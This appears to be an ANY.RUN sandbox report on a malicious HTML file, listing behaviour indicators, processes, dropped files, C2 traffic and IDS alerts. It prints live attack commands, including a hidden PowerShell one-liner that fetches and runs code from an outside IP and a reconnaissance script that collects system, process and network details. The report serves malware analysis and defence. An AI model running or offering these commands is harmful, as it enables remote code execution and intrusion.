Full analysis: https://app.any.run/tasks/fb5d0399-a137-48ef-a039-c4c229f5c1bc
Verdict: Malicious activity
Analysis date: April 15, 2025, 16:30:52
OS: Windows 10 Professional (build: 19044, 64 bit)
Tags: qrcode
Indicators:
MIME: text/html
File info: HTML document, ASCII text, with very long lines (1172), with no line terminators
MD5: 7FA467D54CB91AF033CD4E2411163D12
SHA1: A957929F7D985D924099C52B285FB1B072B824D4
SHA256: D13D0A4E1E59949C81EBE5AC154D94D9B2263C945DB28C7225DD9DBA8F337EE0
SSDEEP: 24:hM0mIJfA+xRhcxKNt+W+urZN/p9bRXHMBe2sgR5AEg5pEI:lmI++x4S9weeRqTpx

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS
    • Connects to the CnC server
      • powershell.exe (PID: 5968)
  • SUSPICIOUS
    • Uses base64 encoding (POWERSHELL)
      • powershell.exe (PID: 5968)
    • Uses SYSTEMINFO.EXE to read the environment
      • powershell.exe (PID: 5968)
      • powershell.exe (PID: 5512)
    • The process checks if current user has admin rights
      • node.exe (PID: 4408)
    • Get information on the list of running processes
      • node.exe (PID: 4408)
      • powershell.exe (PID: 5512)
    • Checks a user's role membership (POWERSHELL)
      • powershell.exe (PID: 5512)
    • Starts POWERSHELL.EXE for commands execution
      • node.exe (PID: 4408)
    • Starts application with an unusual extension
      • powershell.exe (PID: 5512)
    • Process uses ARP to discover network configuration
      • powershell.exe (PID: 5512)
    • Executes script using NodeJS
      • node.exe (PID: 4408)
  • INFO
    • Disables trace logs
      • powershell.exe (PID: 5968)
    • Checks proxy server information
      • powershell.exe (PID: 5968)
      • slui.exe (PID: 7916)
    • The executable file from the user directory is run by the Powershell process
      • node.exe (PID: 4408)
    • Checks supported languages
      • node.exe (PID: 4408)
      • chcp.com (PID: 7404)
    • Reads the software policy settings
      • slui.exe (PID: 7916)
      • slui.exe (PID: 2340)
    • Changes the display of characters in the console
      • powershell.exe (PID: 5512)
    • Uses string replace method (POWERSHELL)
      • powershell.exe (PID: 5512)
      • powershell.exe (PID: 5968)
    • Converts byte array into Unicode string (POWERSHELL)
      • powershell.exe (PID: 5968)
    • Uses string split method (POWERSHELL)
      • powershell.exe (PID: 5968)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.htm/html | HyperText Markup Language with DOCTYPE (80.6)
.html | HyperText Markup Language (19.3)
No data.
All screenshots are available in the full report
Total processes: 152
Monitored processes: 16
Malicious processes: 1
Suspicious processes: 2

Behavior graph

Processes in the graph (start node first): powershell.exe, conhost.exe (no specs), sppextcomobj.exe (no specs), slui.exe, systeminfo.exe (no specs), tiworker.exe (no specs), slui.exe, node.exe, conhost.exe (no specs), powershell.exe (no specs), conhost.exe (no specs), chcp.com (no specs), systeminfo.exe (no specs), tiworker.exe (no specs), tasklist.exe (no specs), arp.exe (no specs)

Process information

PID | CMD | Path | Indicators | Parent process
PID: 2340 | CMD: "C:\WINDOWS\System32\SLUI.exe" RuleId=3482d82e-ca2c-4e1f-8864-da0267b484b2;Action=AutoActivate;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c;NotificationInterval=1440;Trigger=TimerEvent | Path: C:\Windows\System32\slui.exe | Parent process: SppExtComObj.Exe
User: NETWORK SERVICE
Company: Microsoft Corporation
Integrity Level: SYSTEM
Description: Windows Activation Client
Exit code: 1
Version: 10.0.19041.1 (WinBuild.160101.0800)
PID: 2616 | CMD: \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1 | Path: C:\Windows\System32\conhost.exe | Parent process: powershell.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Console Window Host
Exit code: 0
Version: 10.0.19041.1 (WinBuild.160101.0800)
PID: 2772 | CMD: "C:\WINDOWS\system32\systeminfo.exe" | Path: C:\Windows\System32\systeminfo.exe | Parent process: powershell.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Displays system information
Exit code: 0
Version: 10.0.19041.1 (WinBuild.160101.0800)
PID: 2980 | CMD: \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1 | Path: C:\Windows\System32\conhost.exe | Parent process: powershell.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Console Window Host
Exit code: 0
Version: 10.0.19041.1 (WinBuild.160101.0800)
PID: 4408 | CMD: "C:\Users\admin\AppData\Roaming\node-v22.11.0-win-x64\node.exe" -e "[obfuscated JavaScript payload omitted]" | Path: C:\Users\admin\AppData\Roaming\node-v22.11.0-win-x64\node.exe | Parent process: powershell.exe
User: admin
Company: Node.js
Integrity Level: MEDIUM
Description: Node.js JavaScript Runtime
Version: 22.11.0
PID: 4920 | CMD: C:\WINDOWS\system32\SppExtComObj.exe -Embedding | Path: C:\Windows\System32\SppExtComObj.Exe | Parent process: svchost.exe
User: NETWORK SERVICE
Company: Microsoft Corporation
Integrity Level: SYSTEM
Description: KMS Connection Broker
Exit code: 0
Version: 10.0.19041.3996 (WinBuild.160101.0800)
PID: 5512 | CMD: powershell.exe -c "chcp 65001 > $null 2>&1 ; echo 'version: 000012' ; if ([Security.Principal.WindowsIdentity]::GetCurrent().Name -match '(?i)SYSTEM') { 'Runas: System' } elseif (([Security.Principal.WindowsPrincipal] [Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { 'Runas: Admin' } else { 'Runas: User' } ; systeminfo ; echo '=-=-=-=-=-' ; tasklist /svc ; echo '=-=-=-=-=-' ; Get-Service | Select-Object -Property Name, DisplayName | Format-List ; echo '=-=-=-=-=-' ; Get-PSDrive -PSProvider FileSystem | Format-Table -AutoSize ; echo '=-=-=-=-=-' ; arp -a" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Parent process: node.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Windows PowerShell
Exit code: 0
Version: 10.0.19041.1 (WinBuild.160101.0800)
PID: 5892 | CMD: \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1 | Path: C:\Windows\System32\conhost.exe | Parent process: node.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Console Window Host
Version: 10.0.19041.1 (WinBuild.160101.0800)
PID: 5968 | CMD: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w h -c "$a=159; $b=223; $c=139; $d=207; $e=':8080/'; $u=[string]$a+'.'+$b+'.'+$c+'.'+$d+$e; $t=[math]::Floor(([datetime]::UtcNow-[datetime]'1970-01-01').TotalSeconds/16)*16; iex(irm($u+$t))" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Parent process: explorer.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Windows PowerShell
Exit code: 0
Version: 10.0.19041.1 (WinBuild.160101.0800)
PID: 6700 | CMD: "C:\WINDOWS\system32\ARP.EXE" -a | Path: C:\Windows\System32\ARP.EXE | Parent process: powershell.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: TCP/IP Arp Command
Exit code: 0
Version: 10.0.19041.1 (WinBuild.160101.0800)
Total events: 79 452
Read events: 79 447
Write events: 5
Delete events: 0

Modification events

(PID) Process: (7584) TiWorker.exe | Key: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing
Operation: write | Name: SessionIdHigh
Value: 31174179
(PID) Process: (7584) TiWorker.exe | Key: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing
Operation: write | Name: SessionIdLow
Value:
(PID) Process: (5968) powershell.exe | Key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached
Operation: write | Name: {2781761E-28E0-4109-99FE-B9D127C57AFE} {56FFCC30-D398-11D0-B2AE-00A0C908FA49} 0xFFFF
Value: 0100000000000000B228E4F523AEDB01
(PID) Process: (7628) TiWorker.exe | Key: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing
Operation: write | Name: SessionIdHigh
Value: 31174180
(PID) Process: (7628) TiWorker.exe | Key: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing
Operation: write | Name: SessionIdLow
Value:
Executable files: 15
Suspicious files: 1 817
Text files: 693
Unknown types: 0

Dropped files

PID | Process | Filename | Type
5968 | powershell.exe | C:\Users\admin\AppData\Local\Temp\downloaded.zip | -
MD5: -
SHA256: -
5968 | powershell.exe | C:\Users\admin\AppData\Roaming\node-v22.11.0-win-x64\node.exe | -
MD5: -
SHA256: -
5968 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_lxvnir21.04u.psm1 | text
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
5968 | powershell.exe | C:\Users\admin\AppData\Roaming\node-v22.11.0-win-x64\CHANGELOG.md | html
MD5: 50E67CCCAB5C16A988474497C21E060B
SHA256: B8AEC39E3CF2FBDF90D560FED838A5AD0DE61420DE69F5696F7BBB60D1C0C8B2
5968 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms~RF10c19c.TMP | binary
MD5: D040F64E9E7A2BB91ABCA5613424598E
SHA256: D04E0A6940609BD6F3B561B0F6027F5CA4E8C5CF0FB0D0874B380A0374A8D670
5968 | powershell.exe | C:\Users\admin\AppData\Roaming\node-v22.11.0-win-x64\npm.ps1 | text
MD5: 6BD887F4990DFE1A5B9680BD1FC4B44E
SHA256: E2F6B65E0F21781D3FB567898F1E38B922DB809DE490340499B4403CDB14FE75
5968 | powershell.exe | C:\Users\admin\AppData\Roaming\node-v22.11.0-win-x64\nodevars.bat | text
MD5: E6636C5B093F5CC13DFB7508305B8D8B
SHA256: A2B020E2F641524C6FD1B8EBBCD9EE03C7DC44009F2B78E701E773AD048BE9A5
5968 | powershell.exe | C:\Users\admin\AppData\Roaming\node-v22.11.0-win-x64\corepack.cmd | text
MD5: C046E14548EBB384EF71C0EFEA0E857A
SHA256: 920630A1D1EC47AEDEA7345E3C868ECDC07E191373497BBF47FBBF5942FBAD4F
5968 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_deim3qt3.25q.ps1 | text
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
5968 | powershell.exe | C:\Users\admin\AppData\Roaming\node-v22.11.0-win-x64\npx.cmd | text
MD5: 39D6A2470D8B908F3D2A78F519A91DD9
SHA256: 4DD3574F4396FC3B45C52B6AC80FD52BE2DD2660D2A153B4CC807DBBFEEFA7A0
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests: 7
TCP/UDP connections: 26
DNS requests: 15
Threats: 6

HTTP requests

PID | Process | Method | HTTP Code | IP | URL | CN | Reputation
6544 | svchost.exe | GET | 200 | 2.17.190.73:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D | unknown | whitelisted
- | - | GET | 200 | 2.16.241.19:80 | http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl | unknown | whitelisted
5968 | powershell.exe | GET | 200 | 159.223.139.207:8080 | http://159.223.139.207:8080/1744734656 | unknown | unknown
7788 | SIHClient.exe | GET | 200 | 95.101.149.131:80 | http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Product%20Root%20Certificate%20Authority%202018.crl | unknown | whitelisted
4408 | node.exe | POST | 204 | 188.34.195.44:443 | http://188.34.195.44:443/init1234 | unknown | unknown
5968 | powershell.exe | POST | 200 | 159.223.139.207:8080 | http://159.223.139.207:8080/1744734656 | unknown | unknown
7788 | SIHClient.exe | GET | 200 | 95.101.149.131:80 | http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Update%20Secure%20Server%20CA%202.1.crl | unknown | whitelisted

Connections

PID | Process | IP | Domain | ASN | CN | Reputation
4 | System | 192.168.100.255:138 | - | - | - | whitelisted
- | - | 2.16.241.19:80 | crl.microsoft.com | Akamai International B.V. | DE | whitelisted
2104 | svchost.exe | 4.231.128.59:443 | - | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted
- | - | 4.231.128.59:443 | - | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted
5496 | MoUsoCoreWorker.exe | 4.231.128.59:443 | - | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted
2112 | svchost.exe | 4.231.128.59:443 | - | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted
3216 | svchost.exe | 172.211.123.250:443 | client.wns.windows.com | MICROSOFT-CORP-MSN-AS-BLOCK | FR | whitelisted
5968 | powershell.exe | 159.223.139.207:8080 | - | DIGITALOCEAN-ASN | US | unknown
6544 | svchost.exe | 20.190.160.131:443 | login.live.com | MICROSOFT-CORP-MSN-AS-BLOCK | NL | whitelisted
6544 | svchost.exe | 2.17.190.73:80 | ocsp.digicert.com | AKAMAI-AS | DE | whitelisted

DNS requests

Domain | IP | Reputation
crl.microsoft.com | 2.16.241.19 | whitelisted
google.com | 142.250.186.110 | whitelisted
client.wns.windows.com | 172.211.123.250 | whitelisted
login.live.com | 20.190.160.131 | whitelisted
ocsp.digicert.com | 2.17.190.73 | whitelisted
nodejs.org | 104.20.3.6 | whitelisted
settings-win.data.microsoft.com | 51.104.136.2 | whitelisted
slscr.update.microsoft.com | 20.12.23.50 | whitelisted
www.microsoft.com | 95.101.149.131 | whitelisted
fe3cr.delivery.mp.microsoft.com | 13.95.31.18 | whitelisted

Threats

PID | Process | Class | Message
5968 | powershell.exe | A Network Trojan was detected | ET MALWARE Generic Malware CnC Activity - (Unix Timestamp In HTTP URI)
5968 | powershell.exe | Not Suspicious Traffic | ET INFO Windows Powershell User-Agent Usage
5968 | powershell.exe | Not Suspicious Traffic | ET INFO Windows Powershell User-Agent Usage
5968 | powershell.exe | A suspicious string was detected | SUSPICIOUS [ANY.RUN] Decoding FromBase64 HTTP URI String
5968 | powershell.exe | Misc activity | SUSPICIOUS [ANY.RUN] Sent Host Name in HTTP POST Body
4408 | node.exe | Potentially Bad Traffic | ET INFO HTTP traffic on port 443 (POST)
No debug info